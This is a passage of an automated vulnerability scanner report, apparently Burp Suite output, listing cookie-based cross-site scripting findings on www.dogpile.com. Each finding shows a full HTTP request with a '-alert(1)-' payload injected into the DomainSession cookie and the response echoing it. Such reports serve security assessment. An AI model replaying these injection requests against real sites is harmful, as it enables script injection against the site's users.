Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:13:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=973f3f31d2bf4a5f81ddc16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:30 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=973f3f31d2bf4a5f81ddc16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b; expires=Fri, 01 Apr 2011 17:34:31 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.129. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b30"-alert(1)-"3ee9c7682b4 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:49 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=d32b0d4b3c514b5288d5c16a3af0cb01&ActionId=9a55e47eb80046fb8013c16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=9a55e47eb80046fb8013c16a3af0cb01&ActionId=5fefb16cf0bd440c93eac16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:30:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:10:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:10:54 GMT; path=/
Set-Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677854263; path=/
Set-Cookie: wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:10:54 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 160297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=9a55e47eb80046fb8013c16a3af0cb01&ActionId=5fefb16cf0bd440c93eac16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4; expires=Fri, 01 Apr 2011 17:30:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.130. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 172f4"-alert(1)-"a0abe5fa114 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6bf660ba2f2d44129b9bc16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:00 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:00 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 42237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6bf660ba2f2d44129b9bc16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; expires=Fri, 01 Apr 2011 17:18:00 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da425"-alert(1)-"23f7cc263dd was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=3f3afdc0d56d4edda83ec16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:32 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=3f3afdc0d56d4edda83ec16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; expires=Fri, 01 Apr 2011 17:16:32 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6232"-alert(1)-"0b9efa05740 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=461d8d5cd4b54b13a781c16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=461d8d5cd4b54b13a781c16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; expires=Fri, 01 Apr 2011 17:18:37 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ae4"-alert(1)-"eecc2711024 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=9ca43f5d994646fab1d4c16a3af0cb01&ActionId=bc343352182e410c9000c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=a02f9479f63c45cfad66c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:04 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:04 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:03 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=a02f9479f63c45cfad66c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; expires=Fri, 01 Apr 2011 17:16:04 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37a9f"-alert(1)-"9ff850e7c98 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=af484727a0d14b41a32ec16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:28 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:28 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:27 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=af484727a0d14b41a32ec16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; expires=Fri, 01 Apr 2011 17:16:28 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f72c"-alert(1)-"f359c353bfe was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:42 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=943c5c3ef0f147488180c16a3af0cb01&ActionId=576fec2bf7284bfebe21c16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
